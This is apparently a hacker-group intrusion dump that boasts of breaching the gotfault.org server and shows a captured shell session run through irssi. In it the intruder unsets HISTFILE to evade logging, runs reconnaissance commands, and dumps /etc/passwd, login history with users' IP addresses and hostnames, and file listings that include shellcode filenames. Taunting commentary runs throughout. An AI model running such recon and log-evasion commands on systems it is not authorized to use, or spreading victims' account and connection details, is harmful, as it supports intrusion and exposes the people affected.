
#!/usr/bin/gotfault
#dk/archives/submission
#by murz
 ____            __    _____                          __       __     
/\  _`\         /\ \__/\  __`\                      /'__`\    /\ \    
\ \ \L\_\    ___\ \ ,_\ \ \/\ \  __  __  __    ___ /\_\L\ \   \_\ \   
 \ \ \L_L   / __`\ \ \/\ \ \ \ \/\ \/\ \/\ \ /' _ `\/_/_\_<_  /'_` \  
  \ \ \/, \/\ \L\ \ \ \_\ \ \_\ \ \ \_/ \_/ \/\ \/\ \/\ \L\ \/\ \L\ \ 
   \ \____/\ \____/\ \__\\ \_____\ \___x___/'\ \_\ \_\ \____/\ \___,_\
    \/___/  \/___/  \/__/ \/_____/\/__//__/   \/_/\/_/\/___/  \/__,_ /
    
	 Checklist:
              [1] Gain Access (THANKS SETNF)                        :CHECK
              [2] Find 0hdayz                                       :CHECK
              [3] Steal all all the code.                           :CHECK
              [4] backdoor and spread the code.                     :CHECK



login as: publisher
publisher@gotfault.org's password: 
Last login: Wed Jun 15 14:05:06 2005 from murzis@l3.33.37
Enable ANSi? [Y/n]> Y
B+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|                        |
|             ________        __    _____             .__   __               |
|            /  _____/  _____/  |__/ ____\____   __ __|  |_/  |              |
|           /   \  ___ /  _ \   __\   __\\__  \ |  |  \  |\   __\            |
|           \    \_\  (  <_> )  |  |  |   / __ \|  |  /  |_|  |              |
|            \______  /\____/|__|  |  |  (____  /____/|____/__|              |
|                   \/             |  |       \/                             |
|                                  |  |                                      |
|                <A>udits           |  |  <C>chat|
|                <T>oolbox          |  |  <B>lackboard|
|                <P>apers           |  |  <O>ptions|
|                <E>xploits         |  |  <W>ho's Online                 |
|                <S>nipplets        |__|  <L>ogout                       |
|                       |
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+

gotfault> C
14:28 -!- Irssi: Looking up localhost14:28 -!- Irssi: Connecting to localhost

[(status)]                                                                                  
[14:28] [publisher] [1:localhost (change with ^X)] 
14:28 -!- Irssi: Connection to localhost established                                                                         
[publisher] [1:localhost (change with ^X)]  

[14:28]14:28 -!- Ready./exec unset HISTFILE
14:28 -!- Irssi: process 0 (unset HISTFILE) terminated with return code 0       <-- SOO SECURE HUH!?

[14:29]/exec uname -a;id;w
14:29 Linux gerrit 2.4.29-vs1.2.10 #3 SMP Mo Apr 11 17:42:48 CEST 2005 i686 GNU/Linux
14:29 uid=1006(publisher) gid=1006(publisher) groups=1006(publisher)
14:29  14:29:08 up 5 days,  2:37,  6 users,  load average: 0.05, 0.13, 0.15
14:29 USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
14:29 posidron pts/6     02:45    7:59   1.49s  1.13s -bash
14:29 publishe pts/20    13:47    3.00s  1.96s  0.01s /bin/sh /home/publisher/scripts
14:29 publishe pts/23    14:28    0.00s  0.92s  0.01s /bin/sh /home/publisher/scripts
14:29 publishe pts/24    14:02   16:40  12.87s  0.01s /bin/sh /home/publisher/scripts
14:29 setnf    pts/25    14:14    1:03   0.56s  0.55s irssi
14:29 setnf    pts/26    14:24    4.00s  0.03s  0.01s sshd: setnf [priv]
14:29 -!- Irssi: process 0 (uname -a;id;w) terminated with return code 0

/exec ls -al

14:29 total 40
14:29 drwx------   8 publisher publisher 4096 May 23 04:46 .
14:29 drwxr-xr-x  16 root      root      4096 Jun  4 15:56 ..
14:29 -rw-------   1 publisher root         6 May 23 14:39 .bash_history
14:29 drwx------   2 publisher publisher 4096 May 22 19:42 .irssi14:29 drwxr-xr-x   2 publisher publisher 4096 May 23 04:33 ansi
14:29 drwxr-xr-x   2 publisher publisher 4096 May 23 04:42 ascii14:29 drwxr-xr-x   2 publisher publisher 4096 May 23 04:36 bin
14:29 drwxr-xr-x   9 publisher publisher 4096 May 23 04:40 database14:29 -rwxr-xr-x   1 publisher publisher 1124 May 22 19:52 publisher
14:29 drwxr-xr-x   2 publisher publisher 4096 May 23 04:33 scripts
14:29 -!- Irssi: process 0 (ls -al) terminated with return code 0 
[14:30]

14:29 total 4014:29 drwx------   8 publisher publisher 4096 May 23 04:46 .
14:29 drwxr-xr-x  16 root      root      4096 Jun  4 15:56 ..
14:29 -rw-------   1 publisher root         6 May 23 14:39 .bash_history
14:29 drwx------   2 publisher publisher 4096 May 22 19:42 .irssi
14:29 drwxr-xr-x   2 publisher publisher 4096 May 23 04:33 ansi
14:29 drwxr-xr-x   2 publisher publisher 4096 May 23 04:42 ascii
14:29 drwxr-xr-x   2 publisher publisher 4096 May 23 04:36 bin
14:29 drwxr-xr-x   9 publisher publisher 4096 May 23 04:40 database
14:29 -rwxr-xr-x   1 publisher publisher 1124 May 22 19:52 publisher
14:29 drwxr-xr-x   2 publisher publisher 4096 May 23 04:33 scripts
14:29 -!- Irssi: process 0 (ls -al) terminated with return code 0                                                                                                                            

/exec cat /etc/passwd                   <----- WHO BE UP IN DIS BITCH!

14:30 root:x:0:0:root:/root:/bin/bash
14:30 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
14:30 bin:x:2:2:bin:/bin:/bin/sh
14:30 sys:x:3:3:sys:/dev:/bin/sh
14:30 sync:x:4:65534:sync:/bin:/bin/sync
14:30 games:x:5:60:games:/usr/games:/bin/sh
14:30 man:x:6:12:man:/var/cache/man:/bin/sh
14:30 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
14:30 mail:x:8:8:mail:/var/mail:/bin/sh
14:30 news:x:9:9:news:/var/spool/news:/bin/sh
14:30 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
14:30 proxy:x:13:13:proxy:/bin:/bin/sh
14:30 postgres:x:31:32:postgres:/var/lib/postgres:/bin/false
14:30 www-data:x:33:33:www-data:/var/www:/bin/sh
14:30 backup:x:34:34:backup:/var/backups:/bin/sh
14:30 operator:x:37:37:Operator:/var:/bin/false
14:30 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
14:30 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
14:30 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
14:30 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
14:30 sshd:x:100:65534::/var/run/sshd:/bin/false
14:30 postfix:x:101:101::/var/spool/postfix:/bin/false
14:30 mysql:x:102:103:MySQL Server:/var/lib/mysql:/bin/false
14:30 vmail:x:2000:2000::/home/vmail:/bin/false
14:30 snort:x:103:104:Snort IDS:/var/log/snort:/bin/false
14:30 smmsp:x:104:105:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
14:30 setnf:x:1000:100::/home/setnf:/bin/bash
14:30 fourtrax:x:1002:1002:,,,:/home/fourtrax:/bin/bash
14:30 posidron:x:2002:100::/home/posidron:/bin/bash
14:30 rushjo:x:2003:100::/home/rushjo:/bin/bash
14:30 sirphreak:x:2004:100::/home/sirphreak:/bin/bash
14:30 awk:x:2005:100::/home/awk:/bin/bash
14:30 spot:x:2006:100::/home/spot:/bin/bash
14:30 khz:x:2007:100::/home/khz:/bin/bash
14:30 peacetreaty:x:1001:1001:,,,:/home/peacetreaty:/bin/bash           <-- TO BAD G. BUSH DONT KNOW WHAT THIS IS.
14:30 certificate:x:1003:1003:Certificate User,,,:/home/certificate:/home/certificate/bin/stncert/buildssh
14:30 nutshell:x:1004:1004:,,,:/home/nutshell:/bin/bash
14:30 phyro:x:1005:1005:,,,:/home/phyro:/bin/bash
14:30 publisher:x:1006:1006:Publisher System,,,:/home/publisher:/home/publisher/publisher
14:30 trapdown:x:1007:1007:,,,:/home/trapdown:/bin/bash14:30 
-!- Irssi: process 0 (cat /etc/passwd) terminated with return code 0 [14:31]

/exec ls -al /home/
14:31 total 64
14:31 drwxr-xr-x  16 root        root        4096 Jun  4 15:56 .
14:31 drwxr-xr-x  17 root        root        4096 Jun 13 02:11 ..
14:31 drwx------   4 awk         users       4096 Jun 14 00:32 awk
14:31 drwx------   6 certificate certificate 4096 Jun 15 07:48 certificate
14:31 drwx------   2 fourtrax    users       4096 Jan  3 20:43 fourtrax
14:31 drwx------   3 khz         users       4096 May 27 15:02 khz
14:31 drwx------   5 nutshell    users       4096 Jun 10 02:40 nutshell
14:31 drwx------   2 peacetreaty users       4096 Apr 19 
14:31 drwx------   8 phyro       users       4096 May 28 22:26 phyro
14:31 drwx------  12 posidron    users       4096 Jun 15 08:34 posidron   <  th1s m0f0 w1ll sh3llc0d3 y0u t0 d3f !!
14:31 drwx------   8 publisher   publisher   4096 May 23 04:46 publisher
14:31 drwx------   5 rushjo      users       4096 Apr 29 01:39 rushjo
14:31 drwxrwxr-x   9         521         521 4096 Jun 14 23:16 setnf
14:31 drwx------   9 sirphreak   users       4096 Jun  1 09:29 sirphreak
14:31 drwx------   6 spot        users       4096 May 16 02:39 spot
14:31 drwx------   5 trapdown    trapdown    4096 Jun  7 03:12 trapdown
14:31 -!- Irssi: process 0 (ls -al /home/) terminated with return code 0 

[14:32]/exec last

14:32 publishe pts/23       murzis@l3.33.37 
14:28   still logged in   14:32 setnf    pts/26       fw01.goldencross Wed Jun 15 
14:24   still logged in   14:32 setnf    pts/25       fw01.goldencross Wed Jun 15 
14:14   still logged in   14:32 publishe pts/23       h124.91.82.206.i Wed Jun 15 
14:05 - 14:28  (00:23)    14:32 publishe pts/24       193.217.170.12   Wed Jun 15 
14:02   still logged in   14:32 publishe pts/23       196.25.245.194   Wed Jun 15 
13:56 - 14:04  (00:07)    14:32 publishe pts/20       p54818e6b.dip0.t Wed Jun 15 
13:47   still logged in   14:32 publishe pts/20       p54818e6b.dip0.t Wed Jun 15 
13:46 - 13:47  (00:00)    14:32 publishe pts/20       p54818e6b.dip0.t Wed Jun 15 
13:46 - 13:46  (00:00)    14:32 publishe pts/24       p54818e6b.dip0.t Wed Jun 15 
13:45 - 13:46  (00:00)    14:32 publishe pts/20       p54a7ff6c.dip.t- Wed Jun 15 
13:45 - 13:45  (00:00)    14:32 publishe pts/20       p54a7ff6c.dip.t- Wed Jun 15 
13:44 - 13:45  (00:00)    14:32 publishe pts/20       p54818e6b.dip0.t Wed Jun 15 
13:44 - 13:44  (00:00)    14:32 publishe pts/20       p54818e6b.dip0.t Wed Jun 15 
13:43 - 13:44  (00:00)    14:32 publishe pts/20       p54818e6b.dip0.t Wed Jun 15 
13:43 - 13:43  (00:00)    14:32 publishe pts/20       196.25.245.194   Wed Jun 15 
13:37 - 13:42  (00:04)    14:32 publishe pts/20       196.25.245.194   Wed Jun 15 
13:11 - 13:36  (00:25)    14:32 publishe pts/23       193.217.170.12   Wed Jun 15 
13:09 - 13:51  (00:41)    14:32 publishe pts/20       196.25.245.194   Wed Jun 15 
13:07 - 13:10  (00:02)    14:32 publishe pts/23       196.25.245.194   Wed Jun 15 
13:02 - 13:05  (00:02)    14:32 publishe pts/20       193.217.170.12   Wed Jun 15 
12:58 - 13:04  (00:05)    14:32 certific pts/0        bzq-84-108-0-145 Wed Jun 15 
07:48 - 07:49  (00:01)    14:32 posidron pts/6        p50839049.dip0.t Wed Jun 15 
02:45   still logged in   14:32 setnf    pts/0        200.217.89.33    Tue Jun 14 
23:40 - 05:40  (05:59)    14:32 setnf    pts/0        200.217.89.33    Tue Jun 14 
23:14 - 23:31  (00:16)    14:32 publishe pts/0        202.152.162.204  Tue Jun 14 
22:05 - 22:21  (00:16)    14:32 setnf    pts/19       85.195.127.176   Tue Jun 14 
20:27 - 21:08  (00:40)    14:32 setnf    pts/19       85.195.127.176   Tue Jun 14 
20:17 - 20:20  (00:03)    14:32 setnf    pts/19       fw01.goldencross Tue Jun 14 
20:13 - 20:15  (00:02)    14:32 certific pts/7        bzq-218-99-30.re Tue Jun 14 
19:38 - 19:40  (00:01)    14:32 setnf    pts/0        fw01.goldencross Tue Jun 14 
19:32 - 21:33  (02:00)    14:32 publishe pts/0        bzq-218-99-30.re Tue Jun 14 
19:30 - 19:32  (00:01)    14:32 setnf    pts/0        fw01.goldencross Tue Jun 14 
15:34 - 15:34  (00:00)    14:32 setnf    pts/19       fw01.goldencross Tue Jun 14 
14:29 - 15:34  (01:04)    14:32 setnf    pts/6        fw01.goldencross Tue Jun 14 
14:20 - 22:02  (07:41)    14:32 setnf    pts/7        fw01.goldencross Tue Jun 14 
14:15 - 16:28  (02:13)    14:32 setnf    pts/6        fw01.goldencross Tue Jun 14 
14:11 - 14:20  (00:08)    14:32 sirphrea pts/0        wll193-199.wlan. Tue Jun 14 
13:17 - 14:46  (01:29)    14:32 sirphrea pts/7        wll193-199.wlan. Tue Jun 14 
11:28 - 14:15  (02:46)    14:32 sirphrea pts/7        wll193-199.wlan. Tue Jun 14 
10:30 - 10:48  (00:18)    14:32 posidron pts/0        p5083b9c7.dip0.t Tue Jun 14 
04:22 - 04:35  (00:13)    14:32 awk      pts/0        200.164.152.21   Tue Jun 14 
00:16 - 00:32  (00:15)    14:32 publishe pts/0        200.164.152.21   Tue Jun 14 
00:02 - 00:03  (00:01)    14:32 setnf    pts/6        200.164.152.21   Mon Jun 13 
22:43 - 05:33  (06:50)    14:32 setnf    pts/7        fw01.goldencross Mon Jun 13 
21:16 - 22:12  (00:55)    14:32 setnf    pts/0        fw01.goldencross Mon Jun 13 
20:08 - 22:12  (02:03)    14:32 setnf    pts/6        fw01.goldencross Mon Jun 13 
18:39 - 22:00  (03:21)    14:32 setnf    pts/0        fw01.goldencross Mon Jun 13 
18:38 - 19:56  (01:18)    14:32 setnf    pts/0        fw01.goldencross Mon Jun 13 
18:27 - 18:35  (00:08)    14:32 setnf    pts/6        fw01.goldencross Mon Jun 13 
17:55 - 18:00  (00:04)    14:32 setnf    pts/0        fw01.goldencross Mon Jun 13 
14:35 - 18:00  (03:24)    14:32 sirphrea pts/0        wll193-199.wlan. Mon Jun 13 
11:08 - 12:12  (01:04)    14:32 sirphrea pts/19       wll193-242.wlan. Mon Jun 13 
10:23 - 14:29 (1+04:05)   14:32 sirphrea pts/19       wll193-242.wlan. Mon Jun 13 
09:40 - 10:23  (00:43)    14:32 spot     pts/6        200216155083.use Mon Jun 13 
01:57 - 02:01  (00:03)    14:32 publishe pts/6        201008030247.use Mon Jun 13 
01:34 - 01:47  (00:13)    14:32 setnf    pts/0        200216155083.use Mon Jun 13 
01:29 - 04:02  (02:33)    14:32 publishe pts/0        gerrit.gotfault. Mon Jun 13 
01:26 - 01:28  (00:01)    14:32 awk      pts/9        200216155083.use Mon Jun 13 
01:11 - 01:38  (00:27)    14:32 spot     pts/9        200216155083.use Mon Jun 13 
01:04 - 01:06  (00:02)    14:32 setnf    pts/6        200216155083.use Sun Jun 12 
23:20 - 01:28  (02:08)    14:32 posidron pts/7        p5083818d.dip0.t Sun Jun 12 
21:36 - 10:56  (13:19)    14:32 publishe pts/6        201-24-98-161.fn Sun Jun 12 
19:34 - 19:36  (00:01)    14:32 publishe pts/3        193.217.170.12   Sun Jun 12 
13:55 - 13:59  (00:03)    14:32 publishe pts/0        193.217.170.12   Sun Jun 12 
03:31 - 05:10  (01:39)    14:32 publishe pts/0        193.217.170.12   Sun Jun 12 
02:37 - 02:41  (00:04)    14:32 khz      pts/0        200.208.62.95    Sun Jun 12 
01:11 - 01:11  (00:00)    14:32 setnf    pts/3        200-148-13-241.d Sun Jun 12 
00:50 - 00:56  (00:06)    14:32 khz      pts/3        200.208.62.95    Sun Jun 12 

00:37 - 00:40  (00:03)    14:32 setnf    pts/3        200-148-12-208.d Sat Jun 11 
23:56 - 23:58  (00:01)    14:32 khz      pts/2        200.208.62.95    Sat Jun 11 
20:36 - 21:34  (00:57)    14:32 publishe pts/3        cm-84.118.229.16 Sat Jun 11 
19:21 - 19:23  (00:01)    14:32 publishe pts/3        cm-84.118.229.16 Sat Jun 11 
19:21 - 19:21  (00:00)    14:32 posidron pts/0        p5083ae53.dip0.t Sat Jun 11 
19:21 - 01:01  (05:40)    14:32 certific pts/0        cm-84.118.229.16 Sat Jun 11 
19:09 - 19:11  (00:01)    14:32 posidron pts/0        p5083ae53.dip0.t Sat Jun 11 
17:17 - 17:38  (00:20)    14:32 posidron pts/3        p50839631.dip0.t Fri Jun 10 
21:03 - 12:24  (15:21)    14:32 trapdown pts/9        p50839631.dip0.t Fri Jun 10 
20:35 - 20:49  (00:14)    14:32 khz      pts/19       200.208.62.95    Fri Jun 10 
19:57 - 20:06  (00:08)    14:32 khz      pts/19       200.208.62.95    Fri Jun 10 
19:54 - 19:55  (00:00)    14:32 trapdown pts/3        fw01.goldencross Fri Jun 10 
19:29 - 20:49  (01:20)    14:32 sirphrea pts/19       213.191.44.235   Fri Jun 10 
18:20 - 19:45  (01:25)    14:32 trapdown pts/15       fw01.goldencross Fri Jun 10 
16:30 - 17:05  (00:34)    14:32 trapdown pts/11       p50838573.dip0.t Fri Jun 10 
16:30 - 21:16  (04:46)    14:32 posidron pts/10       p50838573.dip0.t Fri Jun 10 
16:24 - 21:23  (04:58)    14:32 spot     pts/11       fw01.goldencross Fri Jun 10 
15:50 - 15:51  (00:00)    14:32 awk      pts/11       fw01.goldencross Fri Jun 10 
15:48 - 15:50  (00:02)    14:32 setnf    pts/7        fw01.goldencross Fri Jun 10 
15:39 - 20:49  (05:09)    14:32 trapdown pts/6        fw01.goldencross Fri Jun 10 
14:13 - 15:47  (01:33)    14:32 publishe pts/4        200.167.24.245   Fri Jun 10 
06:25 - 06:28  (00:03)    14:32 publishe pts/4        200.167.24.245   Fri Jun 10 
06:24 - 06:24  (00:00)    14:32 trapdown pts/4        200217087248.use Fri Jun 10 
05:40 - 06:02  (00:22)    14:32 trapdown pts/4        200217087248.use Fri Jun 10 
05:39 - 05:40  (00:00)    14:32 certific pts/4        201009133118.use Fri Jun 10 
04:01 - 04:02  (00:00)    14:32 trapdown pts/17       200217087248.use Fri Jun 10 
02:39 - 02:44  (00:05)    14:32 nutshell pts/7        200217088033.use Fri Jun 10 
02:31 - 02:40  (00:09)    14:32 trapdown pts/16       200217087248.use Fri Jun 10 
02:08 - 05:39  (03:31)    14:32 awk      pts/15       200217087248.use Fri Jun 10 
01:51 - 06:02  (04:11)    14:32 setnf    pts/14       200216084108.use Fri Jun 10 
01:00 - 03:16  (02:15)    14:32 posidron pts/13       p50838573.dip0.t Thu Jun  9 
23:52 - 11:48  (11:56)    14:32 trapdown pts/11       p50838573.dip0.t Thu Jun  9 
23:35 - 11:48  (12:12)    14:32 setnf    pts/5        200216084108.use Thu Jun  9 
23:12 - 23:19  (00:07)    14:32 awk      pts/5        200216084108.use Thu Jun  9 
23:01 - 23:03  (00:01)    14:32 spot     pts/5        200216084108.use Thu Jun  9 
22:58 - 23:01  (00:02)    14:32 awk      pts/5        200216084108.use Thu Jun  9 
22:57 - 22:58  (00:01)    14:32 trapdown pts/7        200216084108.use Thu Jun  9 
22:34 - 02:31  (03:56)    14:32 trapdown pts/5        fw01.goldencross Thu Jun  9 
21:43 - 22:01  (00:18)    14:32 posidron pts/32       p5083b606.dip0.t Thu Jun  9 
18:42 - down   (17:05)    14:32 trapdown pts/35       p5083b606.dip0.t Thu Jun  9 
18:16 - down   (17:32)    14:32 trapdown pts/37       fw01.goldencross Thu Jun  9 
18:14 - down   (17:34)    14:32 trapdown pts/35       p5083b606.dip0.t Thu Jun  9 
18:05 - 18:16  (00:10)    14:32 trapdown pts/32       p5083870b.dip0.t Thu Jun  9 
17:48 - 18:42  (00:54)    14:32 trapdown pts/40       fw01.goldencross Thu Jun  9 
17:31 - down   (18:17)    14:32 trapdown pts/40       p5083a345.dip0.t Thu Jun  9 
16:23 - 17:31  (01:07)    14:32 posidron pts/37       p5083a345.dip0.t Thu Jun  9 
15:46 - 15:50  (00:03)    14:32 trapdown pts/32       fw01.goldencross Thu Jun  9 
15:36 - 17:45  (02:09)    14:32 setnf    pts/5        fw01.goldencross Thu Jun  9 
15:34 - 21:43  (06:08)    14:32 trapdown pts/35       fw01.goldencross Thu Jun  9 
13:43 - 17:42  (03:59)    14:32 setnf    pts/32       fw01.goldencross Thu Jun  9 
13:41 - 15:34  (01:52)    14:32 sirphrea pts/5        wll193-199.wlan. Thu Jun  9 
13:23 - 14:27  (01:04)    14:32 nutshell pts/5        200165239078.use Thu Jun  9 
05:25 - 06:23  (00:57)    14:32 awk      pts/41       200.216.17.33    Thu Jun  9 
01:28 - 01:41  (00:12)    14:32 trapdown pts/21       200.216.17.33    Thu Jun  9 
00:10 - 04:49  (04:39)    14:32 setnf    pts/35       83.73.183.232.ip Wed Jun  8 
23:44 - 00:00  (00:16)    14:32 setnf    pts/21       200.216.17.33    Wed Jun  8 
23:42 - 00:09  (00:27)    14:32 trapdown pts/41       200.216.17.33    Wed Jun  8 
22:43 - 23:42  (00:58)    14:32 setnf    pts/41       200.216.17.33    Wed Jun  8 
22:43 - 22:43  (00:00)    14:32 trapdown pts/21       fw01.goldencross Wed Jun  8 
19:47 - 21:53  (02:05)    14:32 nutshell pts/41       200216085223.use Wed Jun  8 
19:01 - 19:50  (00:49)    14:32 nutshell pts/41       200216085223.use Wed Jun  8 
19:00 - 19:01  (00:00)    14:32 posidron pts/40       p5083a0c8.dip0.t Wed Jun  8 
18:08 - 04:00  (09:52)    14:32 trapdown pts/35       fw01.goldencross Wed Jun  8 
18:01 - 19:23  (01:21)    14:32 posidron pts/32       p5083a0c8.dip0.t Wed Jun  8 
15:19 - 02:25  (11:05)    14:32 trapdown pts/31       fw01.goldencross Wed Jun  8 
13:44 - 19:54  (06:10)    14:32 setnf    pts/21       fw01.goldencross Wed Jun  8 
13:42 - 19:23  (05:40)    14:32 sirphrea pts/8        wll193-199.wlan. Wed Jun  8 
09:09 - 10:29  (01:19)    14:32 trapdown pts/41       200.217.83.174   Wed Jun  8 
02:21 - 06:11  (03:50)    14:32 trapdown pts/21       200.217.83.174   Wed Jun  8 
02:21 - 03:17  (00:56)    14:32 nutshell pts/32       200.217.83.174   Wed Jun  8 
01:47 - 01:56  (00:08)    14:32 nutshell pts/38       200164253163.use Wed Jun  8 
01:46 - 02:04  (00:17)    14:32 nutshell pts/38       200164253163.use Wed Jun  8 
01:21 - 01:23  (00:02)    14:32 trapdown pts/31       p50839f2d.dip0.t Tue Jun  7 
22:56 - 13:44  (14:48)    14:32 trapdown pts/21       200.217.83.174   Tue Jun  7 
22:53 - 02:20  (03:26)    14:32 publishe pts/46       65.75.181.25     Tue Jun  7 
22:25 - 22:34  (00:08)    14:32 setnf    pts/45       200.217.83.174   Tue Jun  7 
22:24 - 22:53  (00:28)    14:32 certific pts/38       200.138.114.19   Tue Jun  7 
20:36 - 20:36  (00:00)    14:32 certific pts/48       200.138.114.19   Tue Jun  7 
20:34 - 20:34  (00:00)    14:32 trapdown pts/45       fw01.goldencross Tue Jun  7 
20:13 - 21:50  (01:37)    14:32 trapdown pts/38       fw01.goldencross Tue Jun  7 
18:50 - 20:36  (01:45)    14:32 trapdown pts/21       p50839f2d.dip0.t Tue Jun  7 
18:50 - 21:50  (03:00)    14:32 setnf    pts/35       fw01.goldencross Tue Jun  7 
16:37 - 18:49  (02:12)    14:32 trapdown pts/31       fw01.goldencross Tue Jun  7 
14:01 - 17:04  (03:03)    14:32 setnf    pts/31       fw01.goldencross Tue Jun  7 
13:59 - 14:00  (00:01)
14:32 -!- Irssi: process 0 (last) terminated with return code 0

/exec locate * |grep home

14:32 /home/publisher/ansi
14:32 /home/publisher/ansi/audits.menu
14:32 /home/publisher/ansi/blackboard.menu
14:32 /home/publisher/ansi/bytecode.menu
14:32 /home/publisher/ansi/exploits.menu
14:32 /home/publisher/ansi/main.menu
14:32 /home/publisher/ansi/options.menu
14:32 /home/publisher/ansi/papers.menu
14:32 /home/publisher/ansi/snipplets.menu
14:32 /home/publisher/ansi/tools.menu
14:32 /home/publisher/ascii
14:32 /home/publisher/ascii/audits.menu
14:32 /home/publisher/ascii/bytecode.menu
14:32 /home/publisher/ascii/exploits.menu
14:32 /home/publisher/ascii/main.menu
14:32 /home/publisher/ascii/options.menu
14:32 /home/publisher/ascii/papers.menu
14:32 /home/publisher/ascii/snipplets.menu
14:32 /home/publisher/ascii/tools.menu
14:32 /home/certificate/bin
14:32 /home/certificate/bin/stncert
14:32 /home/certificate/bin/stncert.tgz
14:32 /home/certificate/bin/stncert/buildssh
14:32 /home/certificate/bin/stncert/build_ca.sh
14:32 /home/certificate/bin/stncert/build_ca_cert.sh

14:32 /home/certificate/bin/stncert/build_cert.sh
14:32 /home/certificate/bin/stncert/email.txt
14:32 /home/certificate/bin/stncert/ircs.conf
14:32 /home/certificate/bin/stncert/README
14:32 /home/certificate/bin/stncert/removepass.sh
14:32 /home/certificate/bin/stncert/stunnel.pid
14:32 /home/posidron/audit/daemons/jukepeg-1.9/mpglib/tabinit.c
14:32 /home/posidron/audit/ftpd/kadet/bin
14:32 /home/posidron/audit/ftpd/kadet/bin/kadet
14:32 /home/posidron/audit/ftpd/kadet/bin/kadet.in
14:32 /home/posidron/audit/ftpd/kadet/bin/mod
14:32 /home/posidron/audit/ftpd/kadet/bin/mod.in
14:32 /home/posidron/audit/ftpd/pftpd-1.0/.gdbinit
14:32 /home/posidron/audit/httpd/aolserver-4.0.10/nsd/binder.c
14:32 /home/posidron/audit/httpd/aolserver-4.0.10/nsdb/dbinit.c
14:32 /home/posidron/audit/httpd/boa-0.94.13/src/webindex.pl
14:32 /home/posidron/audit/httpd/monkey-0.9.1/bin
14:32 /home/posidron/audit/httpd/monkey-0.9.1/cgi-bin
14:32 /home/posidron/audit/httpd/monkey-0.9.1/cgi-bin/test.pl
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wncat
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnhtmlify
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnindexmaker
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnpnuts
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnredir
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnsectsearch
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnseven_m
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wnv2c
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wn_mkdigest
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wn_mkpasswd
14:32 /home/posidron/audit/httpd/wn-2.4.6/bin/wn_uncache
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/intl/bindtextdom.c
14:32 /home/posidron/audit/local/usr/local/bin
14:32 /home/posidron/audit/local/usr/local/bin/libmikmod-config
14:32 /home/posidron/dump/bytecode/shellcodes/aix/aix-execve_bin-sh.c
14:32 /home/posidron/dump/bytecode/shellcodes/all-OS/LNX-FBSD-bin-sh.c
14:32 /home/posidron/dump/bytecode/shellcodes/alpha/execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/alpha/execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/alpha/portbindsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/bind.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/bsdi-execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/bsdi-execve_binsh2.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve-bin-sh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve-bin-sh.S
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve_binsh.netbsd.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve_binsh3.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve_binsh_cmd.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/fbsd-portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/freebsd.23-bytes-execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/nbsd-execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/nbsd-portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/obsd-execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/obsd-portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/hp-ux/execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/irix/bindsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/irix/execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/irix/irix-bin-sh.c
14:32 /home/posidron/dump/bytecode/shellcodes/irix/irix-mips-bind.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/bin-cat-etc-passwd.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/bin-cat-motd.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/bind2
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/bind2.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/connect-read-exec-63-byte/bind_for_connect-read-exec-63-byte.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve-binsh.c~
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve-binsh1.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve-binsh2.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve_binsh1.c
